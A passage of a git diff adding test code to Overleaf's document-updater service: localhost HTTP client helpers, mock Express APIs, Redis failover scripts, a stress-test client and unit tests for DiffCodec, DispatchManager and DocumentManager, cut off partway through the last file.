DocUpdaterClient.getDoc(projectId, docId, callback) + }, + + peekDoc(projectId, docId, callback) { + request.get( + `http://127.0.0.1:3003/project/${projectId}/doc/${docId}/peek`, + (error, res, body) => { + if (body != null && res.statusCode >= 200 && res.statusCode < 300) { + body = JSON.parse(body) + } + callback(error, res, body) + } + ) + }, + + flushDoc(projectId, docId, callback) { + request.post( + `http://127.0.0.1:3003/project/${projectId}/doc/${docId}/flush`, + (error, res, body) => callback(error, res, body) + ) + }, + + setDocLines(projectId, docId, lines, source, userId, undoing, callback) { + request.post( + { + url: `http://127.0.0.1:3003/project/${projectId}/doc/${docId}`, + json: { + lines, + source, + user_id: userId, + undoing, + }, + }, + (error, res, body) => callback(error, res, body) + ) + }, + + deleteDoc(projectId, docId, callback) { + request.del( + `http://127.0.0.1:3003/project/${projectId}/doc/${docId}`, + (error, res, body) => callback(error, res, body) + ) + }, + + flushProject(projectId, callback) { + request.post(`http://127.0.0.1:3003/project/${projectId}/flush`, callback) + }, + + deleteProject(projectId, callback) { + request.del(`http://127.0.0.1:3003/project/${projectId}`, callback) + }, + + deleteProjectOnShutdown(projectId, callback) { + request.del( + `http://127.0.0.1:3003/project/${projectId}?background=true&shutdown=true`, + callback + ) + }, + + flushOldProjects(callback) { + request.get( + 'http://127.0.0.1:3003/flush_queued_projects?min_delete_age=1', + callback + ) + }, + + acceptChange(projectId, docId, changeId, callback) { + request.post( + `http://127.0.0.1:3003/project/${projectId}/doc/${docId}/change/${changeId}/accept`, + callback + ) + }, + + acceptChanges(projectId, docId, changeIds, callback) { + request.post( + { + url: `http://127.0.0.1:3003/project/${projectId}/doc/${docId}/change/accept`, + json: { change_ids: changeIds }, + }, + callback + ) + }, + + removeComment(projectId, docId, comment, callback) { + request.del( + `http://127.0.0.1:3003/project/${projectId}/doc/${docId}/comment/${comment}`, + callback + ) + }, + + getProjectDocs(projectId, projectStateHash, callback) { + request.get( + `http://127.0.0.1:3003/project/${projectId}/doc?state=${projectStateHash}`, + (error, res, body) => { + if (body != null && res.statusCode >= 200 && res.statusCode < 300) { + body = JSON.parse(body) + } + callback(error, res, body) + } + ) + }, + + sendProjectUpdate(projectId, userId, updates, version, callback) { + request.post( + { + url: `http://127.0.0.1:3003/project/${projectId}`, + json: { userId, updates, version }, + }, + (error, res, body) => callback(error, res, body) + ) + }, +} diff --git a/services/document-updater/test/acceptance/js/helpers/MockDocstoreApi.js b/services/document-updater/test/acceptance/js/helpers/MockDocstoreApi.js new file mode 100644 index 0000000..a2cd915 --- /dev/null +++ b/services/document-updater/test/acceptance/js/helpers/MockDocstoreApi.js @@ -0,0 +1,111 @@ +const express = require('express') +const bodyParser = require('body-parser') +const app = express() +const MAX_REQUEST_SIZE = 2 * (2 * 1024 * 1024 + 64 * 1024) + +const MockDocstoreApi = { + docs: {}, + + clearDocs() { + this.docs = {} + }, + + getDoc(projectId, docId) { + return this.docs[`${projectId}:${docId}`] + }, + + insertDoc(projectId, docId, doc) { + if (doc.version == null) { + doc.version = 0 + } + if (doc.lines == null) { + doc.lines = [] + } + this.docs[`${projectId}:${docId}`] = doc + }, + + patchDocument(projectId, docId, meta, callback) { + Object.assign(this.docs[`${projectId}:${docId}`], meta) + callback(null) + }, + + peekDocument(projectId, docId, callback) { + callback(null, this.docs[`${projectId}:${docId}`]) + }, + + getAllDeletedDocs(projectId, callback) { + callback( + null, + Object.entries(this.docs) + .filter(([key, doc]) => key.startsWith(projectId) && doc.deleted) + .map(([key, doc]) => { + return { + _id: key.split(':')[1], + name: doc.name, + deletedAt: doc.deletedAt, + } + }) + ) + }, + + run() { + app.get('/project/:project_id/doc-deleted', (req, res, next) => { + this.getAllDeletedDocs(req.params.project_id, (error, docs) => { + if (error) { + res.sendStatus(500) + } else { + res.json(docs) + } + }) + }) + + app.get('/project/:project_id/doc/:doc_id/peek', (req, res, next) => { + this.peekDocument( + req.params.project_id, + req.params.doc_id, + (error, doc) => { + if (error) { + res.sendStatus(500) + } else if (doc) { + res.json(doc) + } else { + res.sendStatus(404) + } + } + ) + }) + + app.patch( + '/project/:project_id/doc/:doc_id', + bodyParser.json({ limit: MAX_REQUEST_SIZE }), + (req, res, next) => { + MockDocstoreApi.patchDocument( + req.params.project_id, + req.params.doc_id, + req.body, + error => { + if (error) { + res.sendStatus(500) + } else { + res.sendStatus(204) + } + } + ) + } + ) + + app + .listen(3016, error => { + if (error) { + throw error + } + }) + .on('error', error => { + console.error('error starting MockDocstoreApi:', error.message) + process.exit(1) + }) + }, +} + +MockDocstoreApi.run() +module.exports = MockDocstoreApi diff --git a/services/document-updater/test/acceptance/js/helpers/MockProjectHistoryApi.js b/services/document-updater/test/acceptance/js/helpers/MockProjectHistoryApi.js new file mode 100644 index 0000000..f588d5c --- /dev/null +++ b/services/document-updater/test/acceptance/js/helpers/MockProjectHistoryApi.js @@ -0,0 +1,40 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let MockProjectHistoryApi +const express = require('express') +const app = express() + +module.exports = MockProjectHistoryApi = { + flushProject(docId, callback) { + if (callback == null) { + callback = function () {} + } + return callback() + }, + + run() { + app.post('/project/:project_id/flush', (req, res, next) => { + return this.flushProject(req.params.project_id, error => { + if (error != null) { + return res.sendStatus(500) + } else { + return res.sendStatus(204) + } + }) + }) + + return app.listen(3054, error => { + if (error != null) { + throw error + } + }) + }, +} + +MockProjectHistoryApi.run() diff --git a/services/document-updater/test/acceptance/js/helpers/MockWebApi.js b/services/document-updater/test/acceptance/js/helpers/MockWebApi.js new file mode 100644 index 0000000..5bc3910 --- /dev/null +++ b/services/document-updater/test/acceptance/js/helpers/MockWebApi.js @@ -0,0 +1,121 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let MockWebApi +const express = require('express') +const bodyParser = require('body-parser') +const app = express() +const MAX_REQUEST_SIZE = 2 * (2 * 1024 * 1024 + 64 * 1024) + +module.exports = MockWebApi = { + docs: {}, + + clearDocs() { + return (this.docs = {}) + }, + + insertDoc(projectId, docId, doc) { + if (doc.version == null) { + doc.version = 0 + } + if (doc.lines == null) { + doc.lines = [] + } + doc.pathname = '/a/b/c.tex' + return (this.docs[`${projectId}:${docId}`] = doc) + }, + + setDocument( + projectId, + docId, + lines, + version, + ranges, + lastUpdatedAt, + lastUpdatedBy, + callback + ) { + if (callback == null) { + callback = function () {} + } + const doc = + this.docs[`${projectId}:${docId}`] || + (this.docs[`${projectId}:${docId}`] = {}) + doc.lines = lines + doc.version = version + doc.ranges = ranges + doc.pathname = '/a/b/c.tex' + doc.lastUpdatedAt = lastUpdatedAt + doc.lastUpdatedBy = lastUpdatedBy + return callback(null) + }, + + getDocument(projectId, docId, callback) { + if (callback == null) { + callback = function () {} + } + return callback(null, this.docs[`${projectId}:${docId}`]) + }, + + run() { + app.get('/project/:project_id/doc/:doc_id', (req, res, next) => { + return this.getDocument( + req.params.project_id, + req.params.doc_id, + (error, doc) => { + if (error != null) { + return res.sendStatus(500) + } else if (doc != null) { + return res.send(JSON.stringify(doc)) + } else { + return res.sendStatus(404) + } + } + ) + }) + + app.post( + '/project/:project_id/doc/:doc_id', + bodyParser.json({ limit: MAX_REQUEST_SIZE }), + (req, res, next) => { + return MockWebApi.setDocument( + req.params.project_id, + req.params.doc_id, + req.body.lines, + req.body.version, + req.body.ranges, + req.body.lastUpdatedAt, + req.body.lastUpdatedBy, + error => { + if (error != null) { + return res.sendStatus(500) + } else { + return res.json({ rev: '123' }) + } + } + ) + } + ) + + return app + .listen(3000, error => { + if (error != null) { + throw error + } + }) + .on('error', error => { + console.error('error starting MockWebApi:', error.message) + return process.exit(1) + }) + }, +} + +MockWebApi.run() diff --git a/services/document-updater/test/cluster_failover/js/test_blpop_failover.js b/services/document-updater/test/cluster_failover/js/test_blpop_failover.js new file mode 100644 index 0000000..17d9a26 --- /dev/null +++ b/services/document-updater/test/cluster_failover/js/test_blpop_failover.js @@ -0,0 +1,65 @@ +let listenInBackground, sendPings +const redis = require('@overleaf/redis-wrapper') +const rclient1 = redis.createClient({ + cluster: [ + { + port: '7000', + host: '127.0.0.1', + }, + ], +}) + +const rclient2 = redis.createClient({ + cluster: [ + { + port: '7000', + host: '127.0.0.1', + }, + ], +}) + +let counter = 0 +const sendPing = function (cb) { + if (cb == null) { + cb = function () {} + } + return rclient1.rpush('test-blpop', counter, error => { + if (error != null) { + console.error('[SENDING ERROR]', error.message) + } + if (error == null) { + counter += 1 + } + return cb() + }) +} + +let previous = null +const listenForPing = cb => + rclient2.blpop('test-blpop', 200, (error, result) => { + if (error != null) { + return cb(error) + } + let [, value] = Array.from(result) + value = parseInt(value, 10) + if (value % 10 === 0) { + console.log('.') + } + if (previous != null && value !== previous + 1) { + error = new Error( + `Counter not in order. Got ${value}, expected ${previous + 1}` + ) + } + previous = value + return cb(error, value) + }) + +const PING_DELAY = 100 +;(sendPings = () => sendPing(() => setTimeout(sendPings, PING_DELAY)))() +;(listenInBackground = () => + listenForPing(error => { + if (error) { + console.error('[RECEIVING ERROR]', error.message) + } + return setTimeout(listenInBackground) + }))() diff --git a/services/document-updater/test/cluster_failover/js/test_pubsub_failover.js b/services/document-updater/test/cluster_failover/js/test_pubsub_failover.js new file mode 100644 index 0000000..ebc04a3 --- /dev/null +++ b/services/document-updater/test/cluster_failover/js/test_pubsub_failover.js @@ -0,0 +1,54 @@ +let sendPings +const redis = require('@overleaf/redis-wrapper') +const rclient1 = redis.createClient({ + cluster: [ + { + port: '7000', + host: '127.0.0.1', + }, + ], +}) + +const rclient2 = redis.createClient({ + cluster: [ + { + port: '7000', + host: '127.0.0.1', + }, + ], +}) + +let counter = 0 +const sendPing = function (cb) { + if (cb == null) { + cb = function () {} + } + return rclient1.publish('test-pubsub', counter, error => { + if (error) { + console.error('[SENDING ERROR]', error.message) + } + if (error == null) { + counter += 1 + } + return cb() + }) +} + +let previous = null +rclient2.subscribe('test-pubsub') +rclient2.on('message', (channel, value) => { + value = parseInt(value, 10) + if (value % 10 === 0) { + console.log('.') + } + if (previous != null && value !== previous + 1) { + console.error( + '[RECEIVING ERROR]', + `Counter not in order. Got ${value}, expected ${previous + 1}` + ) + } + return (previous = value) +}) + +const PING_DELAY = 100 +;(sendPings = () => sendPing(() => setTimeout(sendPings, PING_DELAY)))() diff --git a/services/document-updater/test/setup.js b/services/document-updater/test/setup.js new file mode 100644 index 0000000..1099724 --- /dev/null +++ b/services/document-updater/test/setup.js @@ -0,0 +1,52 @@ +const chai = require('chai') +const chaiAsPromised = require('chai-as-promised') +const sinonChai = require('sinon-chai') +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') + +// ensure every ObjectId has the id string as a property for correct comparisons +require('mongodb-legacy').ObjectId.cacheHexString = true + +// Chai configuration +chai.should() +chai.use(chaiAsPromised) +// Load sinon-chai assertions so expect(stubFn).to.have.been.calledWith('abc') +// has a nicer failure messages +chai.use(sinonChai) + +// Global stubs +const sandbox = sinon.createSandbox() +const stubs = { + logger: { + debug: sandbox.stub(), + log: sandbox.stub(), + warn: sandbox.stub(), + err: sandbox.stub(), + error: sandbox.stub(), + }, +} + +// SandboxedModule configuration +SandboxedModule.configure({ + requires: { + '@overleaf/logger': stubs.logger, + 'mongodb-legacy': require('mongodb-legacy'), // for ObjectId comparisons + }, + globals: { Buffer, JSON, Math, console, process }, + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) + +// Mocha hooks +exports.mochaHooks = { + beforeEach() { + this.logger = stubs.logger + }, + + afterEach() { + sandbox.reset() + }, +} diff --git a/services/document-updater/test/stress/js/run.js b/services/document-updater/test/stress/js/run.js new file mode 100644 index 0000000..1bda73c --- /dev/null +++ b/services/document-updater/test/stress/js/run.js @@ -0,0 +1,387 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS202: Simplify dynamic range loops + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const DocUpdaterClient = require('../../acceptance/js/helpers/DocUpdaterClient') +// MockWebApi = require "../../acceptance/js/helpers/MockWebApi" +const assert = require('node:assert') +const async = require('async') + +const insert = function (string, pos, content) { + const result = string.slice(0, pos) + content + string.slice(pos) + return result +} + +const transform = function (op1, op2) { + if (op2.p < op1.p) { + return { + p: op1.p + op2.i.length, + i: op1.i, + } + } else { + return op1 + } +} + +class StressTestClient { + constructor(options) { + if (options == null) { + options = {} + } + this.options = options + if (this.options.updateDelay == null) { + this.options.updateDelay = 200 + } + this.project_id = this.options.project_id || DocUpdaterClient.randomId() + this.doc_id = this.options.doc_id || DocUpdaterClient.randomId() + this.pos = this.options.pos || 0 + this.content = this.options.content || '' + + this.client_id = DocUpdaterClient.randomId() + this.version = this.options.version || 0 + this.inflight_op = null + this.charCode = 0 + + this.counts = { + conflicts: 0, + local_updates: 0, + remote_updates: 0, + max_delay: 0, + } + + DocUpdaterClient.subscribeToAppliedOps((channel, update) => { + update = JSON.parse(update) + if (update.error != null) { + console.error(new Error(`Error from server: '${update.error}'`)) + return + } + if (update.doc_id === this.doc_id) { + return this.processReply(update) + } + }) + } + + sendUpdate() { + const data = String.fromCharCode(65 + (this.charCode++ % 26)) + this.content = insert(this.content, this.pos, data) + this.inflight_op = { + i: data, + p: this.pos++, + } + this.resendUpdate() + return (this.inflight_op_sent = Date.now()) + } + + resendUpdate() { + assert(this.inflight_op != null) + DocUpdaterClient.sendUpdate(this.project_id, this.doc_id, { + doc: this.doc_id, + op: [this.inflight_op], + v: this.version, + meta: { + source: this.client_id, + }, + dupIfSource: [this.client_id], + }) + return (this.update_timer = setTimeout(() => { + console.log( + `[${new Date()}] \t[${this.client_id.slice( + 0, + 4 + )}] WARN: Resending update after 5 seconds` + ) + return this.resendUpdate() + }, 5000)) + } + + processReply(update) { + if (update.op.v !== this.version) { + if (update.op.v < this.version) { + console.log( + `[${new Date()}] \t[${this.client_id.slice( + 0, + 4 + )}] WARN: Duplicate ack (already seen version)` + ) + return + } else { + console.error( + `[${new Date()}] \t[${this.client_id.slice( + 0, + 4 + )}] ERROR: Version jumped ahead (client: ${this.version}, op: ${ + update.op.v + })` + ) + } + } + this.version++ + if (update.op.meta.source === this.client_id) { + if (this.inflight_op != null) { + this.counts.local_updates++ + this.inflight_op = null + clearTimeout(this.update_timer) + const delay = Date.now() - this.inflight_op_sent + this.counts.max_delay = Math.max(this.counts.max_delay, delay) + return this.continue() + } else { + return console.log( + `[${new Date()}] \t[${this.client_id.slice( + 0, + 4 + )}] WARN: Duplicate ack` + ) + } + } else { + assert(update.op.op.length === 1) + this.counts.remote_updates++ + let externalOp = update.op.op[0] + if (this.inflight_op != null) { + this.counts.conflicts++ + this.inflight_op = transform(this.inflight_op, externalOp) + externalOp = transform(externalOp, this.inflight_op) + } + if (externalOp.p < this.pos) { + this.pos += externalOp.i.length + } + return (this.content = insert(this.content, externalOp.p, externalOp.i)) + } + } + + continue() { + if (this.updateCount > 0) { + this.updateCount-- + return setTimeout( + () => { + return this.sendUpdate() + }, + this.options.updateDelay * (0.5 + Math.random()) + ) + } else { + return this.updateCallback() + } + } + + runForNUpdates(n, callback) { + if (callback == null) { + callback = function () {} + } + this.updateCallback = callback + this.updateCount = n + return this.continue() + } + + check(callback) { + if (callback == null) { + callback = function () {} + } + return DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, body) => { + if (error != null) { + throw error + } + if (body.lines == null) { + return console.error( + `[${new Date()}] \t[${this.client_id.slice( + 0, + 4 + )}] ERROR: Invalid response from get doc (${this.doc_id})`, + body + ) + } + const content = body.lines.join('\n') + const { version } = body + if (content !== this.content) { + if (version === this.version) { + console.error( + `[${new Date()}] \t[${this.client_id.slice( + 0, + 4 + )}] Error: Client content does not match server.` + ) + console.error(`Server: ${content.split('a')}`) + console.error(`Client: ${this.content.split('a')}`) + } else { + console.error( + `[${new Date()}] \t[${this.client_id.slice( + 0, + 4 + )}] Error: Version mismatch (Server: '${version}', Client: '${ + this.version + }')` + ) + } + } + + if (!this.isContentValid(this.content)) { + const iterable = this.content.split('') + for (let i = 0; i < iterable.length; i++) { + const chunk = iterable[i] + if (chunk != null && chunk !== 'a') { + console.log(chunk, i) + } + } + throw new Error('bad content') + } + return callback() + } + ) + } + + isChunkValid(chunk) { + const char = 0 + for (let i = 0; i < chunk.length; i++) { + const letter = chunk[i] + if (letter.charCodeAt(0) !== 65 + (i % 26)) { + console.error( + `[${new Date()}] \t[${this.client_id.slice(0, 4)}] Invalid Chunk:`, + chunk + ) + return false + } + } + return true + } + + isContentValid(content) { + for (const chunk of Array.from(content.split('a'))) { + if (chunk != null && chunk !== '') { + if (!this.isChunkValid(chunk)) { + console.error( + `[${new Date()}] \t[${this.client_id.slice(0, 4)}] Invalid content`, + content + ) + return false + } + } + } + return true + } +} + +const checkDocument = function (projectId, docId, clients, callback) { + if (callback == null) { + callback = function () {} + } + const jobs = clients.map(client => cb => client.check(cb)) + return async.parallel(jobs, callback) +} + +const printSummary = function (docId, clients) { + const slot = require('cluster-key-slot') + const now = new Date() + console.log( + `[${now}] [${docId.slice(0, 4)} (slot: ${slot(docId)})] ${ + clients.length + } clients...` + ) + return (() => { + const result = [] + for (const client of Array.from(clients)) { + console.log( + `[${now}] \t[${client.client_id.slice(0, 4)}] { local: ${ + client.counts.local_updates + }, remote: ${client.counts.remote_updates}, conflicts: ${ + client.counts.conflicts + }, max_delay: ${client.counts.max_delay} }` + ) + result.push( + (client.counts = { + local_updates: 0, + remote_updates: 0, + conflicts: 0, + max_delay: 0, + }) + ) + } + return result + })() +} + +const CLIENT_COUNT = parseInt(process.argv[2], 10) +const UPDATE_DELAY = parseInt(process.argv[3], 10) +const SAMPLE_INTERVAL = parseInt(process.argv[4], 10) + +for (const docAndProjectId of Array.from(process.argv.slice(5))) { + ;(function (docAndProjectId) { + const [projectId, docId] = Array.from(docAndProjectId.split(':')) + console.log({ projectId, docId }) + return DocUpdaterClient.setDocLines( + projectId, + docId, + [new Array(CLIENT_COUNT + 2).join('a')], + null, + null, + error => { + if (error != null) { + throw error + } + return DocUpdaterClient.getDoc(projectId, docId, (error, res, body) => { + let runBatch + if (error != null) { + throw error + } + if (body.lines == null) { + return console.error( + `[${new Date()}] ERROR: Invalid response from get doc (${docId})`, + body + ) + } + const content = body.lines.join('\n') + const { version } = body + + const clients = [] + for ( + let pos = 1, end = CLIENT_COUNT, asc = end >= 1; + asc ? pos <= end : pos >= end; + asc ? pos++ : pos-- + ) { + ;(function (pos) { + const client = new StressTestClient({ + doc_id: docId, + project_id: projectId, + content, + pos, + version, + updateDelay: UPDATE_DELAY, + }) + return clients.push(client) + })(pos) + } + + return (runBatch = function () { + const jobs = clients.map( + client => cb => + client.runForNUpdates(SAMPLE_INTERVAL / UPDATE_DELAY, cb) + ) + return async.parallel(jobs, error => { + if (error != null) { + throw error + } + printSummary(docId, clients) + return checkDocument(projectId, docId, clients, error => { + if (error != null) { + throw error + } + return runBatch() + }) + }) + })() + }) + } + ) + })(docAndProjectId) +} diff --git a/services/document-updater/test/unit/js/DiffCodec/DiffCodecTests.js b/services/document-updater/test/unit/js/DiffCodec/DiffCodecTests.js new file mode 100644 index 0000000..5913c64 --- /dev/null +++ b/services/document-updater/test/unit/js/DiffCodec/DiffCodecTests.js @@ -0,0 +1,57 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = '../../../../app/js/DiffCodec.js' +const SandboxedModule = require('sandboxed-module') + +describe('DiffCodec', function () { + beforeEach(function () { + this.callback = sinon.stub() + this.DiffCodec = SandboxedModule.require(modulePath) + }) + + describe('diffAsShareJsOps', function () { + it('should insert new text correctly', function () { + this.before = ['hello world'] + this.after = ['hello beautiful world'] + const ops = this.DiffCodec.diffAsShareJsOp(this.before, this.after) + expect(ops).to.deep.equal([ + { + i: 'beautiful ', + p: 6, + }, + ]) + }) + + it('should shift later inserts by previous inserts', function () { + this.before = ['the boy played with the ball'] + this.after = ['the tall boy played with the red ball'] + const ops = this.DiffCodec.diffAsShareJsOp(this.before, this.after) + expect(ops).to.deep.equal([ + { i: 'tall ', p: 4 }, + { i: 'red ', p: 29 }, + ]) + }) + + it('should delete text correctly', function () { + this.before = ['hello beautiful world'] + this.after = ['hello world'] + const ops = this.DiffCodec.diffAsShareJsOp(this.before, this.after) + expect(ops).to.deep.equal([ + { + d: 'beautiful ', + p: 6, + }, + ]) + }) + + it('should shift later deletes by the first deletes', function () { + this.before = ['the tall boy played with the red ball'] + this.after = ['the boy played with the ball'] + const ops = this.DiffCodec.diffAsShareJsOp(this.before, this.after) + expect(ops).to.deep.equal([ + { d: 'tall ', p: 4 }, + { d: 'red ', p: 24 }, + ]) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/DispatchManager/DispatchManagerTests.js b/services/document-updater/test/unit/js/DispatchManager/DispatchManagerTests.js new file mode 100644 index 0000000..55b2f05 --- /dev/null +++ b/services/document-updater/test/unit/js/DispatchManager/DispatchManagerTests.js @@ -0,0 +1,198 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../../app/js/DispatchManager.js' +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../../app/js/Errors.js') + +describe('DispatchManager', function () { + beforeEach(function () { + let Timer + this.timeout(3000) + this.DispatchManager = SandboxedModule.require(modulePath, { + requires: { + './UpdateManager': (this.UpdateManager = {}), + '@overleaf/settings': (this.settings = { + redis: { + documentupdater: {}, + }, + }), + '@overleaf/redis-wrapper': (this.redis = {}), + './RateLimitManager': {}, + './Errors': Errors, + './Metrics': (this.Metrics = { + Timer: (Timer = (function () { + Timer = class Timer { + static initClass() { + this.prototype.done = sinon.stub() + } + } + Timer.initClass() + return Timer + })()), + }), + }, + }) + this.callback = sinon.stub() + return (this.RateLimiter = { + run(task, cb) { + return task(cb) + }, + }) + }) // run task without rate limit + + return describe('each worker', function () { + beforeEach(function () { + this.client = { auth: sinon.stub() } + this.redis.createClient = sinon.stub().returns(this.client) + return (this.worker = this.DispatchManager.createDispatcher( + this.RateLimiter, + 0 + )) + }) + + it('should create a new redis client', function () { + return this.redis.createClient.called.should.equal(true) + }) + + describe('_waitForUpdateThenDispatchWorker', function () { + beforeEach(function () { + this.project_id = 'project-id-123' + this.doc_id = 'doc-id-123' + this.doc_key = `${this.project_id}:${this.doc_id}` + return (this.client.blpop = sinon + .stub() + .callsArgWith(2, null, ['pending-updates-list', this.doc_key])) + }) + + describe('in the normal case', function () { + beforeEach(function () { + this.UpdateManager.processOutstandingUpdatesWithLock = sinon + .stub() + .callsArg(2) + return this.worker._waitForUpdateThenDispatchWorker(this.callback) + }) + + it('should call redis with BLPOP', function () { + return this.client.blpop + .calledWith('pending-updates-list', 0) + .should.equal(true) + }) + + it('should call processOutstandingUpdatesWithLock', function () { + return this.UpdateManager.processOutstandingUpdatesWithLock + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should not log any errors', function () { + this.logger.error.called.should.equal(false) + return this.logger.warn.called.should.equal(false) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + describe('with an error', function () { + beforeEach(function () { + this.UpdateManager.processOutstandingUpdatesWithLock = sinon + .stub() + .callsArgWith(2, new Error('a generic error')) + return this.worker._waitForUpdateThenDispatchWorker(this.callback) + }) + + it('should log an error', function () { + return this.logger.error.called.should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + describe("with a 'Delete component' error", function () { + beforeEach(function () { + this.UpdateManager.processOutstandingUpdatesWithLock = sinon + .stub() + .callsArgWith(2, new Errors.DeleteMismatchError()) + return this.worker._waitForUpdateThenDispatchWorker(this.callback) + }) + + it('should log a debug message', function () { + return this.logger.debug.called.should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + describe('pending updates list with shard key', function () { + beforeEach(function (done) { + this.client = { + auth: sinon.stub(), + blpop: sinon.stub().callsArgWith(2), + } + this.redis.createClient = sinon.stub().returns(this.client) + this.queueShardNumber = 7 + this.worker = this.DispatchManager.createDispatcher( + this.RateLimiter, + this.queueShardNumber + ) + this.worker._waitForUpdateThenDispatchWorker(done) + }) + + it('should call redis with BLPOP with the correct key', function () { + this.client.blpop + .calledWith(`pending-updates-list-${this.queueShardNumber}`, 0) + .should.equal(true) + }) + }) + }) + + return describe('run', function () { + return it('should call _waitForUpdateThenDispatchWorker until shutting down', function (done) { + let callCount = 0 + this.worker._waitForUpdateThenDispatchWorker = callback => { + if (callback == null) { + callback = function () {} + } + callCount++ + if (callCount === 3) { + this.settings.shuttingDown = true + } + return setTimeout(() => callback(), 10) + } + sinon.spy(this.worker, '_waitForUpdateThenDispatchWorker') + + this.worker.run() + + const checkStatus = () => { + if (!this.settings.shuttingDown) { + // retry until shutdown + setTimeout(checkStatus, 100) + } else { + this.worker._waitForUpdateThenDispatchWorker.callCount.should.equal( + 3 + ) + return done() + } + } + + return checkStatus() + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/DocumentManager/DocumentManagerTests.js b/services/document-updater/test/unit/js/DocumentManager/DocumentManagerTests.js new file mode 100644 index 0000000..e9d68ee --- /dev/null +++ b/services/document-updater/test/unit/js/DocumentManager/DocumentManagerTests.js @@ -0,0 +1,1355 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = '../../../../app/js/DocumentManager.js' +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../../app/js/Errors') +const tk = require('timekeeper') + +describe('DocumentManager', function () { + beforeEach(function () { + tk.freeze(new Date()) + this.Metrics = { + Timer: class Timer {}, + inc: sinon.stub(), + } + this.Metrics.Timer.prototype.done = sinon.stub() + + this.RedisManager = { + promises: { + clearUnflushedTime: sinon.stub().resolves(), + getDoc: sinon.stub(), + getPreviousDocOps: sinon.stub(), + putDocInMemory: sinon.stub().resolves(), + removeDocFromMemory: sinon.stub().resolves(), + renameDoc: sinon.stub().resolves(), + updateCommentState: sinon.stub().resolves(), + updateDocument: sinon.stub().resolves(), + }, + } + this.ProjectHistoryRedisManager = { + promises: { + queueOps: sinon.stub().resolves(), + queueResyncDocContent: sinon.stub().resolves(), + }, + } + this.PersistenceManager = { + promises: { + getDoc: sinon.stub(), + setDoc: sinon.stub().resolves(), + }, + } + this.HistoryManager = { + flushProjectChangesAsync: sinon.stub(), + } + this.DiffCodec = { + diffAsShareJsOp: sinon.stub(), + } + this.UpdateManager = { + promises: { + applyUpdate: sinon.stub().resolves(), + }, + } + this.RangesManager = { + acceptChanges: sinon.stub(), + deleteComment: sinon.stub(), + } + this.Settings = { + max_doc_length: 2 * 1024 * 1024, // 2mb + } + + this.DocumentManager = SandboxedModule.require(modulePath, { + requires: { + './RedisManager': this.RedisManager, + './ProjectHistoryRedisManager': this.ProjectHistoryRedisManager, + './PersistenceManager': this.PersistenceManager, + './HistoryManager': this.HistoryManager, + './Metrics': this.Metrics, + './DiffCodec': this.DiffCodec, + './UpdateManager': this.UpdateManager, + './RangesManager': this.RangesManager, + './Errors': Errors, + '@overleaf/settings': this.Settings, + }, + }) + this.project_id = 'project-id-123' + this.projectHistoryId = 'history-id-123' + this.doc_id = 'doc-id-123' + this.user_id = 1234 + this.lines = ['one', 'two', 'three'] + this.version = 42 + this.ranges = { comments: 'mock', entries: 'mock' } + this.resolvedCommentIds = ['comment-1'] + this.pathname = '/a/b/c.tex' + this.unflushedTime = Date.now() + this.lastUpdatedAt = Date.now() + this.lastUpdatedBy = 'last-author-id' + this.source = 'external-source' + this.historyRangesSupport = false + }) + + afterEach(function () { + tk.reset() + }) + + describe('flushAndDeleteDoc', function () { + describe('successfully', function () { + beforeEach(async function () { + this.DocumentManager.promises.flushDocIfLoaded = sinon.stub().resolves() + await this.DocumentManager.promises.flushAndDeleteDoc( + this.project_id, + this.doc_id, + {} + ) + }) + + it('should flush the doc', function () { + this.DocumentManager.promises.flushDocIfLoaded + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should remove the doc from redis', function () { + this.RedisManager.promises.removeDocFromMemory + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + }) + + describe('when a flush error occurs', function () { + beforeEach(async function () { + this.DocumentManager.promises.flushDocIfLoaded = sinon + .stub() + .rejects(new Error('boom!')) + await expect( + this.DocumentManager.promises.flushAndDeleteDoc( + this.project_id, + this.doc_id, + {} + ) + ).to.be.rejected + }) + + it('should not remove the doc from redis', function () { + this.RedisManager.promises.removeDocFromMemory.called.should.equal( + false + ) + }) + + describe('when ignoring flush errors', function () { + it('should remove the doc from redis', async function () { + await this.DocumentManager.promises.flushAndDeleteDoc( + this.project_id, + this.doc_id, + { ignoreFlushErrors: true } + ) + 